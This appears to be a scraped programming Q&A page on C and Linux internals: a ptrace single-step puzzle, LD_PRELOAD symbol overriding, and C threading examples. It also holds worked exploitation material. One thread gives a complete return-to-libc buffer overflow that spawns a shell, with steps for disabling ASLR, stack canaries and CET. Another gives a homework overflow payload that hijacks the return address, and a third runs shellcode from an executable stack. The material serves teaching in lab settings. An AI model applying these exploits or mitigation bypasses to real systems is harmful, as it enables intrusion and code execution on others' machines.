Why doesn't ptrace SINGLESTEP work properly? - c

I am trying to trace a small program using the ptrace API, but every time the tracer runs it produces wrong results. This is the disassembly of the short program that I want to trace:
$ objdump -d -M intel inc_reg16
inc_reg16: file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
8048060: b8 00 00 00 00 mov eax,0x0
8048065: 66 40 inc ax
8048067: 75 fc jne 0x8048065
8048069: 89 c3 mov ebx,eax
804806b: b8 01 00 00 00 mov eax,0x1
8048070: cd 80 int 0x80
and here is code of the tracer itself:
// ezptrace.c
#include <sys/user.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
int main() {
pid_t child;
child = fork();
if (child == 0) {
ptrace(PTRACE_TRACEME, 0, NULL, NULL);
execv("inc_reg16", NULL);
}
else {
int status;
wait(&status);
struct user_regs_struct regs;
while (1) {
ptrace(PTRACE_GETREGS, child, NULL, &regs);
printf("eip: %x\n", (unsigned int) regs.eip);
ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
waitpid(child, &status, 0);
if(WIFEXITED(status)) break;
}
printf("end\n");
}
return 0;
}
The tracer's job is to single-step the inc_reg16 program and log the address of each instruction it encounters. When I run it and count how many times the instruction 'inc ax' was encountered, the number is different on each run:
$ gcc ezptrace.c -Wall -o ezptrace
$ ./ezptrace > inc_reg16.log
$ grep '8048065' inc_reg16.log | wc -l
65498
the second check:
$ ./ezptrace > inc_reg16.log
$ grep '8048065' inc_reg16.log | wc -l
65494
The problem is that both results should be 65536, because the instruction 'inc ax' is executed exactly 65536 times. Is there a mistake in my code, or is this a bug in ptrace? Your help is greatly appreciated.

I tried the same program under both VirtualBox and VMware. Only VMware gives the correct result; VirtualBox shows the same problem as yours. I used VirtualBox 4.2.1.

eip holds the address of the current instruction in user space. To obtain the instruction itself, follow ptrace(...GETREGS, ...) with a ptrace(...PEEKDATA, ...) at that address. Also keep in mind that ptrace(...PEEKDATA, ...) always returns a full machine word, while the actual opcode usually occupies only the low 16/32 bits of it.

Related

Return to libc buffer overflow attack

I tried to make a return-to-libc buffer overflow. I found the addresses of system, exit and /bin/sh, but when I run the vulnerable program nothing happens, and I don't know why.
system, exit address
/bin/sh address
Vulnerable program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif
int bof(FILE* badfile)
{
char buffer[BUF_SIZE];
fread(buffer, sizeof(char), 300, badfile);
return 1;
}
int main(int argc, char** argv)
{
FILE* badfile;
char dummy[BUF_SIZE * 5];
badfile = fopen("badfile", "r");
bof(badfile);
printf("Return properly.\n");
fclose(badfile);
return 1;
}
Exploit program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buf[40];
FILE* badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe1e; // /bin/sh
*(long *) &buf[20] = 0xb7e369d0; // exit
*(long *) &buf[16] = 0xb7e42da0; // system
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
return 1;
}
And this is the program that I use to find MYSHELL address(for /bin/sh)
#include <stdio.h>
void main()
{
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Terminal:
Terminal image after run retlib
First, there are a number of mitigations that might be deployed to prevent this attack. You need to disable each one:
ASLR: You have already disabled it with sudo sysctl -w kernel.randomize_va_space=0. But a better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash.
Stack protector: The compiler can place stack canaries between the buffer and the return address on the stack, write a value into it before the buffer write operation is executed, and then just before returning, verify that it has not been changed by the buffer write operation. This can be disabled with -fno-stack-protector.
Shadow stack: Newer processors might have a shadow stack feature (Intel CET) that, when calling a function, stashes a copy of the return address away from the writable memory; that copy is checked against the return address when returning from the current function. This (and some other CET protections) can be disabled with -fcf-protection=none.
The question does not mention it, but the addresses used in the code (along with use of long) indicate that a 32-bit system is targeted. If the system used is 64-bit, -m32 needs to be added to the compiler flags:
gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from the shell are identical (at least in length). If one is executed as a.out, the other should also be executed as a.out. Running one from a different path, or with a different argv, will move the environment variable.
Alternatively, you can print the address of the environment variable from within the vulnerable binary.
By looking at the disassembly of bof function, the distance between the buffer and the return address can be determined:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread@plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp) is used as the first parameter to fread, which is the buffer that will be overflowed. Also note that ebp was the value of esp just after pushing ebp in the first instruction. So, ebp points to the saved ebp, which is followed by the return address. That means from the start of the buffer, saved ebp is 20 bytes away, and return address is 24 bytes away. The writes in the exploit program therefore need to start at offset 24 instead of 16:
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$

LD_PRELOAD and linkage

I have this small testcode atfork_demo.c:
#include <stdio.h>
#include <pthread.h>
void hello_from_fork_prepare() {
printf("Hello from atfork prepare.\n");
fflush(stdout);
}
void register_hello_from_fork_prepare() {
pthread_atfork(&hello_from_fork_prepare, 0, 0);
}
Now, I compile it in two different ways:
gcc -shared -fPIC atfork_demo.c -o atfork_demo1.so
gcc -shared -fPIC atfork_demo.c -o atfork_demo2.so -lpthread
My demo main atfork_demo_main.c is this:
#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>
int main(int argc, const char** argv) {
if(argc <= 1) {
printf("usage: ... lib.so\n");
return 1;
}
void* plib = dlopen("libpthread.so.0", RTLD_NOW|RTLD_GLOBAL);
if(!plib) {
printf("cannot load pthread, error %s\n", dlerror());
return 1;
}
void* lib = dlopen(argv[1], RTLD_LAZY);
if(!lib) {
printf("cannot load %s, error %s\n", argv[1], dlerror());
return 1;
}
void (*reg)();
reg = dlsym(lib, "register_hello_from_fork_prepare");
if(!reg) {
printf("did not found func, error %s\n", dlerror());
return 1;
}
reg();
fork();
}
Which I compile like this:
gcc atfork_demo_main.c -o atfork_demo_main.exec -ldl
Now, I have another small demo atfork_patch.c where I want to override pthread_atfork:
#include <stdio.h>
int pthread_atfork(void (*prepare)(void), void (*parent)(void), void (*child)(void)) {
printf("Ignoring pthread_atfork call!\n");
fflush(stdout);
return 0;
}
Which I compile like this:
gcc -shared -O2 -fPIC atfork_patch.c -o atfork_patch.so
And then I set LD_PRELOAD=./atfork_patch.so, and do these two calls:
./atfork_demo_main.exec ./atfork_demo1.so
./atfork_demo_main.exec ./atfork_demo2.so
In the first case, the LD_PRELOAD-override of pthread_atfork worked and in the second, it did not. I get the output:
Ignoring pthread_atfork call!
Hello from atfork prepare.
So, now to the question(s):
Why did it not work in the second case?
How can I make it work also in the second case, i.e. also override it?
In my real use case, atfork_demo is some library which I cannot change. I also cannot change atfork_demo_main but I can make it load any other code. I would prefer if I can just do it with some change in atfork_patch.
You get some more debug output if you also use LD_DEBUG=all. Maybe interesting is this bit, for the second case:
841: symbol=__register_atfork; lookup in file=./atfork_demo_main.exec [0]
841: symbol=__register_atfork; lookup in file=./atfork_patch_extended.so [0]
841: symbol=__register_atfork; lookup in file=/lib/x86_64-linux-gnu/libdl.so.2 [0]
841: symbol=__register_atfork; lookup in file=/lib/x86_64-linux-gnu/libc.so.6 [0]
841: binding file ./atfork_demo2.so [0] to /lib/x86_64-linux-gnu/libc.so.6 [0]: normal symbol `__register_atfork' [GLIBC_2.3.2]
So, it searches for the symbol __register_atfork. I added that to atfork_patch_extended.so but it doesn't find it and uses it from libc instead. How can I make it find and use my __register_atfork?
As a side note, my main goal is to ignore the atfork handlers when fork() is called, but that is a separate question. One solution to that, which seems to work, is to override fork() itself like this:
pid_t fork(void) {
return syscall(SYS_clone, SIGCHLD, 0);
}
Before answering this question, I would stress that this is a really bad idea for any production application.
If you are using a third party library that puts such constraints in place, then think about an alternative solution, such as forking early to maintain a "helper" process, with a pipe between you and it... then, when you need to call exec(), you can request that it does the work (fork(), exec()) on your behalf.
Patching or otherwise side-stepping a library facility such as pthread_atfork() is just asking for trouble (missed events, memory leaks, crashes, etc...).
As @Sergio pointed out, pthread_atfork() is actually built into atfork_demo2.so, so you can't do anything to override it... However, examining the disassembly / source of pthread_atfork() gives you a decent hint about how to achieve what you're asking:
0000000000000830 <__pthread_atfork>:
830: 48 8d 05 f9 07 20 00 lea 0x2007f9(%rip),%rax # 201030 <__dso_handle>
837: 48 85 c0 test %rax,%rax
83a: 74 0c je 848 <__pthread_atfork+0x18>
83c: 48 8b 08 mov (%rax),%rcx
83f: e9 6c fe ff ff jmpq 6b0 <__register_atfork@plt>
844: 0f 1f 40 00 nopl 0x0(%rax)
848: 31 c9 xor %ecx,%ecx
84a: e9 61 fe ff ff jmpq 6b0 <__register_atfork@plt>
or the source:
int
pthread_atfork (void (*prepare) (void),
void (*parent) (void),
void (*child) (void))
{
return __register_atfork (prepare, parent, child, &__dso_handle == NULL ? NULL : __dso_handle);
}
As you can see, pthread_atfork() does nothing aside from calling __register_atfork()... so patch that instead!
The content of atfork_patch.c now becomes (using __register_atfork()'s prototype):
#include <stdio.h>
int __register_atfork (void (*prepare) (void), void (*parent) (void),
void (*child) (void), void *dso_handle) {
printf("Ignoring pthread_atfork call!\n");
fflush(stdout);
return 0;
}
This works for both demos:
$ LD_PRELOAD=./atfork_patch.so ./atfork_demo_main.exec ./atfork_demo1.so
Ignoring pthread_atfork call!
$ LD_PRELOAD=./atfork_patch.so ./atfork_demo_main.exec ./atfork_demo2.so
Ignoring pthread_atfork call!
It doesn't work in the second case because there is nothing to override: your second library has pthread_atfork statically linked into it:
$ readelf --symbols atfork_demo1.so | grep pthread_atfork
7: 0000000000000000 0 NOTYPE GLOBAL DEFAULT UND pthread_atfork
54: 0000000000000000 0 NOTYPE GLOBAL DEFAULT UND pthread_atfork
$ readelf --symbols atfork_demo2.so | grep pthread_atfork
41: 0000000000000000 0 FILE LOCAL DEFAULT ABS pthread_atfork.c
47: 0000000000000830 31 FUNC LOCAL DEFAULT 12 __pthread_atfork
49: 0000000000000830 31 FUNC LOCAL DEFAULT 12 pthread_atfork
So it will use local pthread_atfork each time, regardless of LD_PRELOAD or any other loaded libraries.
How can you overcome that? For the described configuration it looks like it is not possible, since you would need to modify the atfork_demo library or the main executable anyway.

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input to gets(). We are not supposed to modify the code in any way, only create a malicious input that will cause a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp with rsp because I am on a 64-bit system, but that came up with the same result. Is there a workaround for this, or another way to find the address of buf?
Since buf is an array of 12 characters, any input longer than that overflows the buffer.
First, you need to find the offset at which the saved return address, and with it the instruction pointer (EIP, or RIP on 64-bit), gets overwritten.
gdb with the peda extension is very useful for this:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now you know that the return address is overwritten at offset 24, which gives you control of the instruction pointer (RIP in this 64-bit build). Since your homework only needs to print the "Gotcha!\n" string, just jump to the oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Build the exploit input and run it:
[manu@debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu@debian /tmp]$ ./bof < input
Gotcha!

Execution of function pointer to Shellcode

I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main.
The problem is I'm getting segmentation fault.
#include <stdio.h>
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
void main()
{
int *ret;
ret = (int *)&ret + 2; // +2 to get to the return address on the stack
(*ret) = (int)shellcode;
}
Execution result in Segmentation error.
[user1@fedo BOF]$ gcc -o ExitShellCode ExitShellCode.c
[user1@fedo BOF]$ ./ExitShellCode
Segmentation fault (core dumped)
This is the Objdump of the shellcode.a
[user1@fedo BOF]$ objdump -d exitShellcodeaAss
exitShellcodeaAss: file format elf32-i386
Disassembly of section .text:
08048054 <_start>:
8048054: bb 14 00 00 00 mov $0x14,%ebx
8048059: b8 01 00 00 00 mov $0x1,%eax
804805e: cd 80 int $0x80
System I'm using
fedora Linux 3.1.2-1.fc16.i686
ASLR is disabled.
Debugging with GDB.
gcc version 4.6.2
Maybe it is too late to answer this question, but there might be a syntax error. It seems that the shellcode is malformed, I mean:
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
is not the same as:
char shellcode[]= "\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
Although this fix alone won't solve the problem, have you tried disabling kernel protection mechanisms such as the NX bit, stack randomization, etc.?
Based on two other questions, namely "How to determine return address on stack?" and "C: return address of function (mac)", I'm confident that you are not overwriting the correct address. This comes from your assumption that the return address can be located the way you did it. But as the answer to the first question states, this need not be the case.
Therefore:
Check if the address is really correct
Find a way to determine the correct return address, if you do not want to use the built-in GCC feature
You can also execute shellcode like in this scenario, by casting the buffer to a function like
(*(int(*)()) shellcode)();
If you want the shellcode to be executed on the stack, you must compile with an executable stack (-z execstack, which turns off NX for the stack). -fno-stack-protector additionally disables stack canaries:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
E.g.
#include <stdio.h>
#include <string.h>
const char code[] ="\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
int main()
{
printf("Length: %zu bytes\n", strlen(code)); /* strlen stops at the first zero byte */
(*(void(*)()) code)();
return 0;
}
If you want to debug it with gdb:
[manu@debian /tmp]$ gdb ./shellcode
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
...
Reading symbols from ./shellcode...(no debugging symbols found)...done.
(gdb) b *&code
Breakpoint 1 at 0x4005c4
(gdb) r
Starting program: /tmp/shellcode
Length: 2 bytes
Breakpoint 1, 0x00000000004005c4 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x00000000004005c4 <+0>: mov $0x14,%ebx
0x00000000004005c9 <+5>: mov $0x1,%eax
0x00000000004005ce <+10>: int $0x80
0x00000000004005d0 <+12>: add %cl,0x6e(%rbp,%riz,2)
End of assembler dump.
In this proof-of-concept example the null bytes do not matter. But when you are developing shellcode you should keep them in mind and remove the bad characters.
Shellcode generally must not contain zero bytes, because string-based copies stop at the first null. Remove the null characters.

How do I start threads in plain C?

I have used fork() in C to start another process. How do I start a new thread?
Since you mentioned fork() I assume you're on a Unix-like system, in which case POSIX threads (usually referred to as pthreads) are what you want to use.
Specifically, pthread_create() is the function you need to create a new thread. Its arguments are:
int pthread_create(pthread_t *thread, const pthread_attr_t *attr,
void *(*start_routine)(void *), void *arg);
The first argument is a pointer through which the new thread's ID is returned. The second argument is the thread attributes, which can be NULL unless you want to start the thread with non-default settings such as a specific priority. The third argument is the function executed by the thread. The fourth argument is the single argument passed to the thread function when it is executed.
AFAIK, ANSI C doesn't define threading, but there are various libraries available.
If you are running on Windows, link to msvcrt and use _beginthread or _beginthreadex.
If you are running on other platforms, check out the pthreads library (I'm sure there are others as well).
C11 threads + C11 atomic_int
Added in glibc 2.28. Tested on Ubuntu 18.10 amd64 (which comes with glibc 2.28) and on Ubuntu 18.04 (which comes with glibc 2.27) by compiling glibc 2.28 from source: Multiple glibc libraries on a single host
Example adapted from: https://en.cppreference.com/w/c/language/atomic
main.c
#include <stdio.h>
#include <threads.h>
#include <stdatomic.h>
atomic_int atomic_counter;
int non_atomic_counter;
int mythread(void* thr_data) {
(void)thr_data;
for(int n = 0; n < 1000; ++n) {
++non_atomic_counter;
++atomic_counter;
// for this example, relaxed memory order is sufficient, e.g.
// atomic_fetch_add_explicit(&atomic_counter, 1, memory_order_relaxed);
}
return 0;
}
int main(void) {
thrd_t thr[10];
for(int n = 0; n < 10; ++n)
thrd_create(&thr[n], mythread, NULL);
for(int n = 0; n < 10; ++n)
thrd_join(thr[n], NULL);
printf("atomic %d\n", atomic_counter);
printf("non-atomic %d\n", non_atomic_counter);
}
GitHub upstream.
Compile and run:
gcc -ggdb3 -std=c11 -Wall -Wextra -pedantic -o main.out main.c -pthread
./main.out
Possible output:
atomic 10000
non-atomic 4341
The non-atomic counter is very likely to be smaller than the atomic one due to racy access across threads to the non-atomic variable.
See also: How to do an atomic increment and fetch in C?
Disassembly analysis
Disassemble with:
gdb -batch -ex "disassemble/rs mythread" main.out
contains:
17 ++non_atomic_counter;
0x00000000004007e8 <+8>: 83 05 65 08 20 00 01 addl $0x1,0x200865(%rip) # 0x601054 <non_atomic_counter>
18 __atomic_fetch_add(&atomic_counter, 1, __ATOMIC_SEQ_CST);
0x00000000004007ef <+15>: f0 83 05 61 08 20 00 01 lock addl $0x1,0x200861(%rip) # 0x601058 <atomic_counter>
so we see that the atomic increment is done at the instruction level with the f0 lock prefix.
With aarch64-linux-gnu-gcc 8.2.0, we get instead:
11 ++non_atomic_counter;
0x0000000000000a28 <+24>: 60 00 40 b9 ldr w0, [x3]
0x0000000000000a2c <+28>: 00 04 00 11 add w0, w0, #0x1
0x0000000000000a30 <+32>: 60 00 00 b9 str w0, [x3]
12 ++atomic_counter;
0x0000000000000a34 <+36>: 40 fc 5f 88 ldaxr w0, [x2]
0x0000000000000a38 <+40>: 00 04 00 11 add w0, w0, #0x1
0x0000000000000a3c <+44>: 40 fc 04 88 stlxr w4, w0, [x2]
0x0000000000000a40 <+48>: a4 ff ff 35 cbnz w4, 0xa34 <mythread+36>
so the atomic version actually has a cbnz loop that runs until the stlxr store succeeds. Note that ARMv8.1 can do all of that with a single LDADD instruction.
This is analogous to what we get with C++ std::atomic: What exactly is std::atomic?
Benchmark
TODO. Create a benchmark to show that atomic is slower.
POSIX threads
main.c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <stdlib.h>
#include <pthread.h>
enum CONSTANTS {
NUM_THREADS = 1000,
NUM_ITERS = 1000
};
int global = 0;
int fail = 0;
pthread_mutex_t main_thread_mutex = PTHREAD_MUTEX_INITIALIZER;
void* main_thread(void *arg) {
int i;
for (i = 0; i < NUM_ITERS; ++i) {
if (!fail)
pthread_mutex_lock(&main_thread_mutex);
global++;
if (!fail)
pthread_mutex_unlock(&main_thread_mutex);
}
return NULL;
}
int main(int argc, char **argv) {
pthread_t threads[NUM_THREADS];
int i;
fail = argc > 1;
for (i = 0; i < NUM_THREADS; ++i)
pthread_create(&threads[i], NULL, main_thread, NULL);
for (i = 0; i < NUM_THREADS; ++i)
pthread_join(threads[i], NULL);
assert(global == NUM_THREADS * NUM_ITERS);
return EXIT_SUCCESS;
}
Compile and run:
gcc -std=c99 -Wall -Wextra -pedantic -o main.out main.c -pthread
./main.out
./main.out 1
The first run works fine, the second fails due to missing synchronization.
There don't seem to be POSIX standardized atomic operations: UNIX Portable Atomic Operations
Tested on Ubuntu 18.04. GitHub upstream.
GCC __atomic_* built-ins
For those that don't have C11, you can achieve atomic increments with the __atomic_* GCC extensions.
main.c
#define _XOPEN_SOURCE 700
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
enum Constants {
NUM_THREADS = 1000,
};
int atomic_counter;
int non_atomic_counter;
void* mythread(void *arg) {
(void)arg;
for (int n = 0; n < 1000; ++n) {
++non_atomic_counter;
__atomic_fetch_add(&atomic_counter, 1, __ATOMIC_SEQ_CST);
}
return NULL;
}
int main(void) {
int i;
pthread_t threads[NUM_THREADS];
for (i = 0; i < NUM_THREADS; ++i)
pthread_create(&threads[i], NULL, mythread, NULL);
for (i = 0; i < NUM_THREADS; ++i)
pthread_join(threads[i], NULL);
printf("atomic %d\n", atomic_counter);
printf("non-atomic %d\n", non_atomic_counter);
}
Compile and run:
gcc -ggdb3 -O3 -std=c99 -Wall -Wextra -pedantic -o main.out main.c -pthread
./main.out
Output and generated assembly: the same as the "C11 threads" example.
Tested in Ubuntu 16.04 amd64, GCC 6.4.0.
pthreads is a good start, look here
Threads are not part of the C standard, so the only way to use threads is to use some library (eg: POSIX threads in Unix/Linux, _beginthread/_beginthreadex if you want to use the C-runtime from that thread or just CreateThread Win32 API)
Check out the pthread (POSIX thread) library.
